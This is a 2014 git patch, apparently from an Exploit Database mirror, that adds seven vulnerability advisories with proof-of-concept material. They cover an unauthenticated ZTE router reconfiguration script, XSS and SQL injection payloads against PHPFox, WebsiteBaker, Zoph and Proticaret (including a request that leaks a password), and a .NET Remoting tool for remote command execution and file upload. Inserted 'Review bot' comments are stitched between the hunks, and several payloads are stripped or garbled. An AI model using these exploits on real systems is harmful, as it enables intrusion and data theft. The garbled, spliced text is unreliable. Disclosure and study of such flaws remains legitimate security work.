From a28bed7356f7bf323e0d097e4be284da08fafaf0 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Wed, 19 Nov 2014 04:49:39 +0000
Subject: [PATCH] Updated 11_19_2014

---
 files.csv | 7 ++
 platforms/hardware/webapps/35276.txt | 71 +++++++++++++++
 platforms/osx/dos/35279.html | 127 +++++++++++++++++++++++++++
 platforms/php/webapps/35274.txt | 80 +++++++++++++++++
 platforms/php/webapps/35277.txt | 111 +++++++++++++++++++++++
 platforms/php/webapps/35278.txt | 84 ++++++++++++++++++
 platforms/windows/remote/35280.txt | 78 ++++++++++++++++
 platforms/xml/webapps/35275.txt | 124 ++++++++++++++++++++++++++
 8 files changed, 682 insertions(+)
 create mode 100755 platforms/hardware/webapps/35276.txt
 create mode 100755 platforms/osx/dos/35279.html
 create mode 100755 platforms/php/webapps/35274.txt
 create mode 100755 platforms/php/webapps/35277.txt
 create mode 100755 platforms/php/webapps/35278.txt
 create mode 100755 platforms/windows/remote/35280.txt
 create mode 100755 platforms/xml/webapps/35275.txt

diff --git a/files.csv b/files.csv
index ee8d6dc1f..6b7f7a689 100755
--- a/files.csv
+++ b/files.csv
@@ -31767,3 +31767,10 @@ id,file,description,date,author,platform,type,port
 35265,platforms/php/webapps/35265.php,"WordPress Recip.ly 1.1.7 'uploadImage.php' Arbitrary File Upload Vulnerability",2011-01-25,"AutoSec Tools",php,webapps,0
 35266,platforms/php/webapps/35266.txt,"MyBB Forums 1.8.2 - Stored XSS Vulnerability",2014-11-17,"Avinash Thapa",php,webapps,0
 35272,platforms/hardware/webapps/35272.txt,"ZTE ZXHN H108L - Authentication Bypass",2014-11-17,"Project Zero Labs",hardware,webapps,0
+35274,platforms/php/webapps/35274.txt,"PHPFox - Stored XSS Vulnerability",2014-11-17,spyk2r,php,webapps,80
+35275,platforms/xml/webapps/35275.txt,"Proticaret E-Commerce Script 3.0 - SQL Injection",2014-11-17,"BGA Security",xml,webapps,80
+35276,platforms/hardware/webapps/35276.txt,"ZTE ZXHN H108L - Authentication Bypass",2014-11-17,"Project Zero Labs",hardware,webapps,80
+35277,platforms/php/webapps/35277.txt,"WebsiteBaker 2.8.3 - Multiple Vulnerabilities",2014-11-17,"Manuel García Cárdenas",php,webapps,80
+35278,platforms/php/webapps/35278.txt,"Zoph 0.9.1 - Multiple Vulnerabilities",2014-11-17,"Manuel García Cárdenas",php,webapps,80
+35279,platforms/osx/dos/35279.html,"Safari 8.0 / OS X 10.10 - Crash PoC",2014-11-17,w3bd3vil,osx,dos,0
+35280,platforms/windows/remote/35280.txt,".NET Remoting Services Remote Command Execution",2014-11-17,"James Forshaw",windows,remote,0
diff --git a/platforms/hardware/webapps/35276.txt b/platforms/hardware/webapps/35276.txt
new file mode 100755
index 000000000..2193b79a8
--- /dev/null
+++ b/platforms/hardware/webapps/35276.txt
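Review bot: The added row 35276 duplicates the existing 35272 entry three lines above — same title "ZTE ZXHN H108L - Authentication Bypass", same author "Project Zero Labs", same date 2014-11-17 — differing only in the file path and the port column (0 vs 80), so one of the two looks like an accidental re-submission and should be reconciled before both are published under separate ids. The port column is also applied inconsistently: the new webapps rows carry 80 while the context webapps rows carry 0, and the convention is not evident from the surrounding lines. The 35275 row is filed under platform `xml`, whereas that advisory's stack trace (`ASPNetPortal.ProductService.GetProductCodes`) comes from an ASP.NET SOAP service, so the categorization may be worth a second look.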
@@ -0,0 +1,71 @@ +About the software +================== + +ZTE ZXHN H108L is provided by some large Greek ISPs to their subscribers. + +Vulnerability Details +===================== + +CWMP configuration is accessible only through the Administrator account. CWMP is a protocol widely used by ISPs worldwide for remote provisioning and troubleshooting their subscribers' equipment. However editing the CWMP configuration (more specifically sending the POST request) does not require any user authentication. + +Affected Products +================= +Device model : ZTE ZXHN H108L +Firmware Version : ZXHN H108LV4.0.0d_ZRQ_GR4 + +Proof of Concept +================ + +#!/usr/bin/python + +import requests + +acs_server = "http://:" +acs_user = "user" +acs_pass = "pass" + +# Connection request parameters. When a request is made to the following URL, using the specified user/pass combination, +# router will connect back to the ACS server. + +conn_url = "/tr069" +conn_port = "7564" +conn_user = "user" +conn_pass = "pass" + +#Periodic inform parameters +active = 1 +interval = 2000 + +payload = {'CWMP_active': '1', 'CWMP_ACSURL': acs_server,'CWMP_ACSUserName': acs_user,'CWMP_ACSPassword': acs_pass, 'CWMP_ConnectionRequestPath': conn_url, 'CWMP_ConnectionRequestPort': conn_port, 'CWMP_ConnectionRequestUserName': conn_user, 'CWMP_ConnectionRequestPassword': conn_pass, 'CWMP_PeriodActive': active, 'CWMP_PeriodInterval': interval, 'CWMPLockFlag': '0' } + +r = requests.post("http://192.168.1.254/Forms/access_cwmp_1", data=payload) + +Impact +====== + +The described vulnerability allows any unauthenticated user to edit the CWMP configuration. Exploitation can be performed by LAN users or through the Internet if the router is configured to expose the web interface to WAN. Also because the router lacks of CSRF protection, malicious JS code can be deployed in order to exploit the vulnerability through a malicious web page. 
+ +Severity +======== + +Medium + +References +========== + +https://projectzero.gr/en/2014/11/zte-zxhn-h108l-authentication-bypass/ + + +Disclosure Timeline +=================== + +27/10/2014 - First communication attempt to both vendor and ISP +04/11/2014 - ZTE response states that ISP should be contacted +03/11/2014 - Second attempt to contact the ISP. +14/11/2014 - No response from ISP. Public Disclosure + +Contact Information +=================== +Domain: https://projectzero.gr +Social: twitter.com/projectzerolabs +Contact: labs _at_ projectzero.gr \ No newline at end of file diff --git a/platforms/osx/dos/35279.html b/platforms/osx/dos/35279.html new file mode 100755 index 000000000..bbddcdc3c --- /dev/null +++ b/platforms/osx/dos/35279.html @@ -0,0 +1,127 @@ +@w3bd3vil + + + + + + + + + + + + + \ No newline at end of file diff --git a/platforms/php/webapps/35274.txt b/platforms/php/webapps/35274.txt new file mode 100755 index 000000000..cc4bada64 --- /dev/null +++ b/platforms/php/webapps/35274.txt 
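Review bot: The advisory has no Solution or Workaround section even though its Impact paragraph already names the exposure conditions (LAN access, the web interface exposed to WAN, and the absent CSRF protection); a short section stating that the management interface should not be reachable from WAN and that no firmware fix was available at disclosure would give affected subscribers something actionable. The Disclosure Timeline is out of order — `04/11/2014 - ZTE response` is listed before `03/11/2014 - Second attempt to contact the ISP` — so one of the two dates is likely a typo. Angle-bracket content appears to have been stripped on import across this commit: here the PoC's `acs_server = "http://:"` has lost its host/port placeholder text, `platforms/osx/dos/35279.html` is reduced to `@w3bd3vil` and blank lines although its hunk header says 127 lines, and the markup in the PoC sections of 35274, 35277, 35278 and 35275 is likewise missing; the files should be re-imported from the original submissions rather than committed in this form.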
@@ -0,0 +1,80 @@ +# Exploit Title: PHPFox XSS AdminCP +# Date: 2014-10-22 +# Exploit Author: Wesley Henrique Leite aka "spyk2r" +# Vendor Homepage: http://www.moxi9.com +# Version: All version +# CVE : CVE-2014-8469 + +# Response Vendor: fixed 2014-10-23 (to v4 Beta) + +[+] DESCRIPTION + +The system stores all urls accessed in a database table, below +information in the same 'phpfox_log_session' + +[phpfox]> desc phpfox_log_session; ++---------------+----------------------+------+-----+---------+-------+ +| Field | Type | Null | Key | Default | Extra | ++---------------+----------------------+------+-----+---------+-------+ +++++++++++ more values and +| user_agent | varchar(100) | NO | | NULL | | ++---------------+----------------------+------+-----+---------+-------+ + +the column that can be manipulated is: +-> user_agent (100) + +all acess store in the system, such as bots and users wandering around the +web site, can be seen in: + +AdminCP +TOOLS > Online > Guests/Boots + +Output +| IP ADDRESS | User-Agent | ... + +knowing this, the following code was created to inject a script into the +AdminCP with User-Agent. + +$ curl -A "" \ + http://www.meusite.com.br/ + +OR + +$ curl -A "" http://www.meusite.com.br/ + +when any user with administrative access in. +'AdminCP' +TOOLS > Online > Guests/Boots + +we have the script running in the administrative area. + + +[+] My Solution + + (line 1.8) + + 1.1 --- a/module/core/template/default/controller/admincp/online-guest.html.php +Tue Oct 21 10:00:11 2014 -0200 + 1.2 +++ b/module/core/template/default/controller/admincp/online-guest.html.php +Tue Oct 21 12:28:39 2014 -0200 + 1.3 @@ -25,7 +25,7 @@ + 1.4 {foreach from=$aGuests key=iKey item=aGuest} + 1.5 + 1.6 {$aGuest.ip_address} + 1.7 - {$aGuest.user_agent} + 1.8 + {$aGuest.user_agent|strip_tags} + 1.9 + 1.10
+ 1.11 {img +theme='misc/bullet_green.png' alt=''} + 1.12 @@ -43,4 +43,4 @@ + 1.13
+ 1.14 {phrase var='admincp.no_guests_online'} + 1.15
+ 1.16 -{/if} + 1.17 \ No newline at end of file + 1.18 +{/if} diff --git a/platforms/php/webapps/35277.txt b/platforms/php/webapps/35277.txt new file mode 100755 index 000000000..fb313cd4c --- /dev/null +++ b/platforms/php/webapps/35277.txt 
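Review bot: The fix proposed under "My Solution" at line 1.8 (`{$aGuest.user_agent|strip_tags}`) removes tags rather than encoding output, which is a weaker control than HTML-encoding the value where it is rendered (PHP's `htmlspecialchars`, or the template engine's equivalent escape modifier): tag stripping still passes through characters that are significant in attribute or script contexts, and nothing in the patch covers other places the same column may be displayed. The root cause stated in the description is that a request header is stored verbatim in `phpfox_log_session.user_agent` and later shown in a trusted AdminCP view, so the remediation worth documenting is output encoding on every rendering of that column, not filtering in one template. The advisory also says "Version: All version" while the vendor response line says fixed in v4 Beta; the affected range should be stated as "up to the version preceding the v4 Beta fix" so readers can tell whether they are covered.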
@@ -0,0 +1,111 @@ +============================================= +MGC ALERT 2014-004 +- Original release date: March 11, 2014 +- Last revised: November 18, 2014 +- Discovered by: Manuel Garcia Cardenas +- Severity: 10/10 (CVSS Base Score) +============================================= + +I. VULNERABILITY +------------------------- +Multiple Vulnerabilities in WebsiteBaker 2.8.3 + +II. BACKGROUND +------------------------- +WebsiteBaker helps you to create the website you want: A free, easy and +secure, flexible and extensible open source content management system (CMS). + +III. DESCRIPTION +------------------------- +It is possible to inject SQL code in the variable "id" on the page +"modify.php". This bug was found using the portal without authentication. +To exploit the vulnerability only is needed use the version 1.0 of the HTTP +protocol to interact with the application. +Has been detected a reflected XSS vulnerability in WebsiteBaker, that +allows the execution of arbitrary HTML/script code to be executed in the +context of the victim user's browser. +An input validation problem exists within WebsiteBaker which allows +injecting CR (carriage return - %0D or \r) and LF (line feed - %0A or \n) +characters into the server HTTP response header, resulting in a HTTP +Response Splitting Vulnerability. + +IV. 
PROOF OF CONCEPT +------------------------- +SQL Injection: + +/wb/admin/pages/modify.php?page_id=1 + +Cross-Site Scripting GET: + +/wb/admin/admintools/tool.php?tool=captcha_control&6d442">8e3b12642a8=1 +/wb/modules/edit_module_files.php?page_id=1&mod_dir=news&edit_file=frontend.css&action=edit&page_id=1§ion_id=%007e3939f8a40a7355f9acf0 +/wb/modules/news/add_post.php?page_id=1§ion_id=f953a">4ddf3369c1f +/wb/modules/news/modify_group.php?page_id=1§ion_id=%008cf03">2680504c3ec&group_id=62be99873b33d1d3 +/wb/modules/news/modify_post.php?page_id=1§ion_id=%003874a4194d511605&post_id=db89943875a2db52 +/wb/modules/news/modify_settings.php?page_id=1§ion_id=%008b2f4">bdc8b3919b5 + +HTTP RESPONSE SPLITTING: + +If you enter a valid user and password, you can inject on the headers +malicious code, example. + +POST /wb/admin/login/index.php HTTP/1.1 +Content-Length: 204 +Content-Type: application/x-www-form-urlencoded +Referer: http://192.168.244.129:80/wb/ +Host: 127.0.0.1 +Connection: Keep-alive +Accept-Encoding: gzip,deflate +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, +like Gecko) Chrome/28.0.1500.63 Safari/537.36 +Accept: */* + +password_fieldname=password_nwh1uuwb&password_nwh1uuwb=VALIDPASS&remember=true&submit=Entrar& +url=%0d%0a%20InjectedHeader:MaliciousCode&username_fieldname=username_nwh1uuwb&username_nwh1uuwb=adminResponse + +You can inject a new header named: InjectedHeader:MaliciousCode because we +inject a CR&LF new line with %0d%0a%20. + +V. BUSINESS IMPACT +------------------------- +Public defacement, confidential data leakage, and database server +compromise can result from these attacks. Client systems can also be +targeted, and complete compromise of these client systems is also possible. + +VI. SYSTEMS AFFECTED +------------------------- +WebsiteBaker <= 2.8.3 + +VII. SOLUTION +------------------------- +No news releases + +VIII. REFERENCES +------------------------- +http://www.websitebaker.org + +IX. 
CREDITS +------------------------- +This vulnerability has been discovered and reported +by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com). + +X. REVISION HISTORY +------------------------- +March 11, 2014 1: Initial release + +XI. DISCLOSURE TIMELINE +------------------------- +March 11, 2014 1: Vulnerability acquired by Manuel Garcia Cardenas +March 11, 2014 2: Send to vendor +June 05, 2014 3: Second mail to the verdor without response +November 18, 2014 4: Sent to lists + +XII. LEGAL NOTICES +------------------------- +The information contained within this advisory is supplied "as-is" with no +warranties or guarantees of fitness of use or otherwise. + +XIII. ABOUT +------------------------- +Manuel Garcia Cardenas +Pentester \ No newline at end of file diff --git a/platforms/php/webapps/35278.txt b/platforms/php/webapps/35278.txt new file mode 100755 index 000000000..a9a10bfad --- /dev/null +++ b/platforms/php/webapps/35278.txt 
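Review bot: Section III says the SQL injection is in the variable `id` on `modify.php`, but the Proof of Concept line `/wb/admin/pages/modify.php?page_id=1` names `page_id` and contains no injection marker at all, so the advisory as committed does not demonstrate the claim it makes; either the parameter name in section III or the PoC line should be corrected. The Severity is given as 10/10 while the description states the response-splitting issue requires a valid username and password, so the score should either be justified by the unauthenticated SQL injection alone or split per issue. Section VII ("No news releases") would be more useful to operators if it stated plainly that no fixed version was known at the last revision date and pointed at the vendor URL already given in section VIII.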
@@ -0,0 +1,84 @@ +============================================= +MGC ALERT 2014-005 +- Original release date: March 5, 2014 +- Last revised: November 18, 2014 +- Discovered by: Manuel Garcia Cardenas +- Severity: 10/10 (CVSS Base Score) +============================================= + +I. VULNERABILITY +------------------------- +Multiple Vulnerabilities in Zoph <= 0.9.1 + +II. BACKGROUND +------------------------- +Zoph (Zoph Organizes Photos) is a web based digital image presentation and +management system. In other words, a photo album. It is built with PHP, +MySQL and Perl. + +III. DESCRIPTION +------------------------- +It is possible to inject SQL code in the variables "id" and "action" on the +pages group, photos and user. This bug was found using the portal with +authentication. To exploit the vulnerability only is needed use the version +1.0 of the HTTP protocol to interact with the application. +Has been detected a reflected XSS vulnerability in Zoph, that allows the +execution of arbitrary HTML/script code to be executed in the context of +the victim user's browser. + +IV. PROOF OF CONCEPT +------------------------- +SQL Injection: + +/zoph/php/group.php?_action=1'%22&_clear_crumbs=1 +/zoph/php/photos.php?location_id=1'%22 +/zoph/php/user.php?user_id=&_action=1'%22 + +Cross-Site Scripting GET: + +/zoph/php/edit_photos.php?photographer_id=3"> +/zoph/php/edit_photos.php?album_id=2&_crumb=3"> + +V. BUSINESS IMPACT +------------------------- +Public defacement, confidential data leakage, and database server +compromise can result from these attacks. Client systems can also be +targeted, and complete compromise of these client systems is also possible. + +VI. SYSTEMS AFFECTED +------------------------- +Zoph <= 0.9.1 + +VII. SOLUTION +------------------------- +No news releases + +VIII. REFERENCES +------------------------- +http://www.zoph.org/ + +IX. 
CREDITS +------------------------- +This vulnerability has been discovered and reported +by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com). + +X. REVISION HISTORY +------------------------- +March 11, 2014 1: Initial release + +XI. DISCLOSURE TIMELINE +------------------------- +March 5, 2014 1: Vulnerability acquired by Manuel Garcia Cardenas +March 5, 2014 2: Send to vendor +June 17, 2014 3: Second mail to the verdor without response +November 18, 2014 4: Sent to lists + +XII. LEGAL NOTICES +------------------------- +The information contained within this advisory is supplied "as-is" with no +warranties or guarantees of fitness of use or otherwise. + +XIII. ABOUT +------------------------- +Manuel Garcia Cardenas +Pentester \ No newline at end of file diff --git a/platforms/windows/remote/35280.txt b/platforms/windows/remote/35280.txt new file mode 100755 index 000000000..39daba63c --- /dev/null +++ b/platforms/windows/remote/35280.txt 
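Review bot: The revision history line `March 11, 2014 1: Initial release` does not match this advisory's header (`Original release date: March 5, 2014`) or its disclosure timeline, which starts on March 5; it appears to have been copied from the sibling WebsiteBaker advisory (MGC ALERT 2014-004) in this same commit and should be corrected. Section III names the injectable variables as `id` and `action`, while the PoC lines use `_action`, `location_id` and `user_id`, so the description should use the actual parameter names. The disclosure timeline also says the bug was found "with authentication", which is worth reflecting in the severity statement since it is currently given as 10/10 without qualification.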
@@ -0,0 +1,78 @@ +Source: https://github.com/tyranid/ExploitRemotingService +Exploit Database Mirror: http://www.exploit-db.com/sploits/35280.zip + +ExploitRemotingService (c) 2014 James Forshaw +============================================= + +A tool to exploit .NET Remoting Services vulnerable to CVE-2014-1806 or CVE-2014-4149. +It only works on Windows although some aspects _might_ work in Mono on *nix. + +Usage Instructions: +=================== + +ExploitRemotingService [options] uri command [command args] +Copyright (c) James Forshaw 2014 + +Uri: +The supported URI are as follows: +tcp://host:port/ObjName - TCP connection on host and portname +ipc://channel/ObjName - Named pipe channel + +Options: + + -s, --secure Enable secure mode + -p, --port=VALUE Specify the local TCP port to listen on + -i, --ipc=VALUE Specify listening pipe name for IPC channel + --user=VALUE Specify username for secure mode + --pass=VALUE Specify password for secure mode + --ver=VALUE Specify version number for remote, 2 or 4 + --usecom Use DCOM backchannel instead of .NET remoting + --remname=VALUE Specify the remote object name to register + -v, --verbose Enable verbose debug output + --useser Uses old serialization tricks, only works on + full type filter services + -h, -?, --help + +Commands: +exec [-wait] program [cmdline]: Execute a process on the hosting server +cmd cmdline : Execute a command line process and display stdou +t +put localfile remotefile : Upload a file to the hosting server +get remotefile localfile : Download a file from the hosting server +ls remotedir : List a remote directory +run file [args] : Upload and execute an assembly, calls entry point +user : Print the current username +ver : Print the OS version + +This tool supports exploit both TCP remoting services and local IPC services. To test +the exploit you need to know the name of the .NET remoting service and the port it's +listening on (for TCP) or the name of the Named Pipe (for IPC). 
You can normally find +this in the server or client code. Look for things like calls to: + +RemotingConfiguration.RegisterWellKnownServiceType or Activator.CreateInstance + +You can then try the exploit by constructing an appropriate URL. If TCP you can use the +URL format tcp://hostname:port/ServiceName. For IPC use ipc://NamedPipeName/ServiceName. + +A simple test is to do: + +ExploitRemotingService SERVICEURL ver + +If successful it should print the OS version of the hosting .NET remoting service. If +you get an exception it might be fixed with CVE-2014-1806. At this point try the COM +version using: + +ExploitRemotingService -usecom SERVICEURL ver + +This works best locally but can work remotely if you modify the COM configuration and +disable the firewall you should be able to get it to work. If that still doesn't work +then it might be an up to date server. Instead you can also try the full serialization +version using. + +ExploitRemotingService -useser SERVICEURL ls c:\ + +For this to work the remoting service must be running with full typefilter mode enabled +(which is some, especially IPC services). It also only works with the commands ls, put +and get. But that should be enough to compromise a box. + +I've provided an example service to test against. \ No newline at end of file diff --git a/platforms/xml/webapps/35275.txt b/platforms/xml/webapps/35275.txt new file mode 100755 index 000000000..23ec94baf --- /dev/null +++ b/platforms/xml/webapps/35275.txt 
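Review bot: The Commands list is broken mid-word — `cmd cmdline : Execute a command line process and display stdou` is followed by a line holding only `t` — which is a wrap artifact that should be rejoined to `stdout` before the README is committed. The text names CVE-2014-1806 and CVE-2014-4149 but never states the defensive reading: that a server whose first `ver` check fails with an exception is expected to be patched for CVE-2014-1806, and that a service running with full type-filter mode remains exposed via the `-useser` path until that configuration is changed; a sentence to that effect would let administrators use the README to confirm their own remediation. The "Exploit Database Mirror" zip is referenced but only this README is committed, so nothing in the hunk can be checked against the tool's actual source.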
@@ -0,0 +1,124 @@ +Document Title: +============ +Proticaret E-Commerce Script v3.0 >= SQL Injection + +Release Date: +=========== +13 Nov 2014 + +Product & Service Introduction: +======================== +Proticaret is a free e-commerce script. + +Abstract Advisory Information: +======================= +BGA Security Team discovered an SQL injection vulnerability in Proticaret E-Commerce Script v3.0 + +Vulnerability Disclosure Timeline: +========================= +20 Oct 2014 : Contact with Vendor +20 Nov 2014 : Vendor Response +June 26, 2014 : Patch Released +13 Nov 2014 : Public Disclosure + +Discovery Status: +============= +Published + +Affected Product(s): +=============== +Promist Bilgi ?leti?im Teknolojileri A.? +Product: Proticaret E-commerce Script v3.0 >= + +Exploitation Technique: +================== +Remote, Unauthenticated + + +Severity Level: +=========== +Critical + +Technical Details & Description: +======================== +SQL Injection + +Proof of Concept (PoC): +================== +Proof of Concept + +Request: + + + + + + 1' from Users where (select top 1 password from users where userId=101)>1- - + + ? + + + + +Response: + + + + + soap:Server + +System.Web.Services.Protocols.SoapException: Server +was unable to process request. ---> +System.Data.SqlClient.SqlException: Conversion failed when converting +the nvarchar value 'secretpassword' to data type int. 
+ at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction) + +at System.Data.SqlClient.SqlInternalConnection.OnError(SqlException +exception, Boolean breakConnection, Action`1 wrapCloseInAction) + at + +System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning(TdsParserStateObject +stateObj, Boolean callerHasConnectionLock, Boolean asyncClose) + at +System.Data.SqlClient.TdsParser.TryRun(RunBehavior runBehavior, +SqlCommand cmdHandler, SqlDataReader dataStream, BulkCopySimpleResultSet +bulkCopyHandler, TdsParserStateObject stateObj, Boolean& +dataReady) + at System.Data.SqlClient.SqlDataReader.TryHasMoreRows(Boolean& moreRows) + at System.Data.SqlClient.SqlDataReader.TryReadInternal(Boolean setTimeout, Boolean& more) + at System.Data.SqlClient.SqlDataReader.Read() + at ASPNetPortal.ProductService.GetProductCodes(String Code, String StartWith) + --- End of inner exception stack trace --- + + + + + + +Solution Fix & Patch: +================ +Apply the patch for v3.0 + +Security Risk: +========== +The risk of the vulnerabilities above estimated as critical. + +Credits & Authors: +============== +Bilgi Güvenli?i Akademisi + +Disclaimer & Information: +=================== +The +information provided in this advisory is provided as it is without any +warranty. BGA disclaims all warranties, either expressed or implied, +including the warranties of merchantability and capability for a +particular purpose. BGA or its suppliers are not liable in any case of +damage, including direct, indirect, incidental, consequential loss of +business profits or special damages. + +Domain: www.bga.com.tr +Social: twitter.com/bgasecurity +Contact: bilgi@bga.com.tr + +Copyright © 2014 | BGA \ No newline at end of file
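Review bot: The Vulnerability Disclosure Timeline is internally inconsistent — `20 Nov 2014 : Vendor Response` is dated after both the `13 Nov 2014` release/public-disclosure date and this commit (19 Nov 2014), and `June 26, 2014 : Patch Released` precedes the `20 Oct 2014` first vendor contact — so at least two of the four dates are wrong and should be corrected before publication. Several Turkish characters are mis-encoded as `?` (`Promist Bilgi ?leti?im Teknolojileri A.?`, `Bilgi Güvenli?i Akademisi`), which garbles both the vendor name in "Affected Product(s)" and the credited team. "Solution Fix & Patch: Apply the patch for v3.0" names no version number or download location, so an operator cannot tell from the advisory whether a given installation already carries the fix.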